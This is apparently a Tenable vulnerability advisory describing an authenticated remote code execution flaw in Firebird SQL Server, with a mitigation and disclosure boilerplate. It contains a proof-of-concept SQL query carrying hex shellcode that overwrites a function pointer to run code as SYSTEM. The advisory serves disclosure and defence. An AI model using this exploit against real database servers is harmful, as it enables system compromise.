Synopsis
While investigating CVE-2017-6369 for Firebird SQL Server, Tenable discovered an authenticated remote code execution vulnerability. The vulnerability exists because Firebird allows users to define external functions that don’t match the original definition of the entry point.
For example, the documentation for string2blob indicates it’s defined like this:
DECLARE EXTERNAL FUNCTION string2blob VARCHAR(300) BY DESCRIPTOR, BLOB RETURNS PARAMETER 2 ENTRY_POINT 'string2blob' MODULE_NAME 'fbudf'
However, an authenticated user could declare a second external function that looks like this:
DECLARE DECLARE EXTERNAL FUNCTION a6 VARCHAR(300) BY DESCRIPTOR, VARCHAR(400) BY DESCRIPTOR RETURNS INTEGER ENTRY_POINT 'string2blob' MODULE_NAME 'fbudf'
You can see that the original string2blob has a BLOB as the second parameter and the second definition has a VARCHAR(400) as the second parameter. By passing in a crafted VARCHAR during a query, an authenticated attacker can overwrite the blob_put_segment function pointer in the blobcallback struct. string2blob will eventually call the overwritten function pointer which leads to remote code execution as SYSTEM.
We wrote a proof of concept using the IE8 on Win7 (x86) virtual machine and Firebird SQL Server 2.5.7 32-bit release. The proof of concept pops calc.exe.
SQL> select a6((select x'31db648b7b308b7f0c8b7f1c8b47088b77208b3f807e0c3375f289c703783c8b577801c28b7a2001c789dd8b34af01c645813e4372656175f2817e086f63657375e98b7a2401c7668b2c6f8b7a1c01c78b7caffc01c789d9b1ff53e2fd6863616c6389e252525353535353535253ffd7' from rdb$database), (select x'11111111C8FD8503' from rdb$database)) from rdb$database;
Solution
No official solution exists. However, Tenable believes that disabling external UDF libraries from being loaded mitigates this issue. In order to achieve this, edit the default configuration from UdfAccess=Restrict to UdfAccess=None. This will prevent the fbudf module from being loaded, but it will also break other functionality relying on modules.Disclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]
Contact our sales team